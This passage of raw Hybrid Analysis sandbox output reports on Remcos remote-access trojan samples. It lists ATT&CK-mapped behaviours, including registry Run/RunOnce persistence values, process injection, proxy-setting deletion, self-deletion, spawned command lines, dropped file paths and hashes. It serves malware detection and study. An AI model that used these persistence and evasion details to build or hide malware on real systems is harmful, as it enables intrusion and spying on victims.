\"cx\": \"1\"\n \"cy\": \"1\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"352389254\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1392575193\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1392575193\"\n \"cx\": \"17\"\n \"cy\": \"92\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindFirstFileA\" with parameter C:\\*.* (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter $Recycle.Bin (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter 02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter autoexec.bat (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter config.sys (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Documents and Settings (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter dotnet.au3 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter dotnet48.exe (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter MSOCache (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter pagefile.sys (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter PerfLogs (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Program Files (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter ProgramData (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Recovery (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter System Volume Information (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Temp (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter TorService (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Users (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"FindNextFileA\" with parameter Windows (UID: 00000000-00004836)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"hab.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WScript.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"remcos.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hab.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"WScript.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"remcos.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" opened \"\\Device\\KsecDD\"\n \"hab.exe\" opened \"\\Device\\KsecDD\"\n \"remcos.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Windows\\win.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" claimed CRC 422416 while the actual is CRC 424146\n \"hab.exe\" claimed CRC 422216 while the actual is CRC 423966\n \"remcos.exe\" claimed CRC 422266 while the actual is CRC 424011", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"hab.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"BRU\"; Value: \"wscript \"%TEMP%\\hab.vbs\"\")\n \"hab.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"REMCOS\"; Value: \"\"%APPDATA%\\remcos\\remcos.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00005392]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00006020]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 53248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"remcos.exe\" wrote 53248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" has section name .text with entropy \"6.462991933\"\n \"hab.exe\" has section name .text with entropy \"6.462991933\"\n \"remcos.exe\" has section name .text with entropy \"6.462991933\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" spawned likely due to injection\n Process \"%TEMP%\\hab.exe\" spawned likely due to injection\n Process \"%APPDATA%\\remcos\\remcos.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"hab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"hab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"WScript.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"WScript.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"remcos.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"remcos.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF1AC662582614E06D.TMP\" for deletion\n \"WScript.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" for deletion\n \"WScript.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\" for deletion\n \"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF1D04DE1F2F70FD42.TMP\" for deletion\n \"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFCF316E7289036290.TMP\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF1AC662582614E06D.TMP\" with delete access\n \"WScript.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" with delete access\n \"WScript.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\" with delete access\n \"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF1D04DE1F2F70FD42.TMP\" with delete access\n \"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFCF316E7289036290.TMP\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00004744)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00004488)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00005656)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00004300)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00003476)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00006020)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (UID: 00000000-00004836)\n Spawned process \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (UID: 00000000-00004744)\n Spawned process \"hab.exe\" (UID: 00000000-00003504)\n Spawned process \"hab.exe\" (UID: 00000000-00004488)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005428)\n Spawned process \"remcos.exe\" (UID: 00000000-00005488)\n Spawned process \"remcos.exe\" (UID: 00000000-00005656)\n Spawned process \"hab.exe\" (UID: 00000000-00005744)\n Spawned process \"hab.exe\" (UID: 00000000-00004300)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003576)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005984)\n Spawned process \"remcos.exe\" (UID: 00000000-00005944)\n Spawned process \"remcos.exe\" (UID: 00000000-00003476)\n Spawned process \"hab.exe\" (UID: 00000000-00003996)\n Spawned process \"hab.exe\" (UID: 00000000-00006020)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003016)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00003564)\n Spawned process \"remcos.exe\" (UID: 00000000-00002916)\n Spawned process \"remcos.exe\" (UID: 00000000-00002208)\n Spawned process \"hab.exe\" (UID: 00000000-00001392)\n Spawned process \"hab.exe\" (UID: 00000000-00001988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 32 bytes to a remote process \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Handle: 384)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 52 bytes to a remote process \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Handle: 384)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 4 bytes to a remote process \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Handle: 384)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 392)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 392)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 392)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 760)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"hab.exe\" allocated memory in \"%TEMP%\\hab.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03
https://hybrid-analysis.com/sample/006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03
Hybrid Analysis - Remcos
{"size": 1115065, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03", "sha256": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03", "av_detect": 80, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 22, "total_signatures": 321, "extracted_files": [{"name": "Dxpserver.exe", "file_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "file_size": 1115073, "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe (PID: 3444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "remcos.exe", "file_path": "%APPDATA%\\remcos\\remcos.exe", "file_size": 1115073, "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe 